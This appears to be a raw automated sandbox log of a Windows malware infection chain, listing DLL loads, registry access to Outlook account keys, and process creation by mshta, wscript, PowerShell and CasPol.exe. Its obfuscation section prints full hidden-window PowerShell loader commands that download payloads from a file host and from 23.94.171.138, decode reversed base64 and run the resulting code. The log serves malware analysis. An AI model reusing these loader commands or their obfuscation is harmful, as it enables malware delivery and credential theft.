Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbd source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncount
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbE source: powershell.exe, 00000003.00000002.1482460145.0000000008446000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.pdb source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCE3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_03100A35 pushfd ; iretd 1_2_03100A3A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0310416D push ebx; ret 1_2_031042DA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04885662 push eax; iretd 3_2_04885699
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04880ABD pushfd ; iretd 3_2_04880AC2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_048A0A25 pushfd ; iretd 8_2_048A0A2A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_047869F0 push esp; ret 10_2_04786E09
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04780DAD pushfd ; iretd 10_2_04780DB2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_004567E0 push eax; ret 12_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00463EF3 push ds; retf 12_2_00463EEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_04572806 push ecx; ret 12_2_04572819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_1000B146 push ecx; ret 12_2_1000B159
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_1002343D push esi; ret 12_2_10023446
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_0044693D push ecx; ret 18_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_0044DB70 push eax; ret 18_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_0044DB70 push eax; ret 18_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_00451D54 push eax; ret 18_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00414060 push eax; ret 24_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00414060 push eax; ret 24_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00414039 push ecx; ret 24_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004164EB push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00416553 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00416555 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW, 12_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 12_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCE3
                    Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
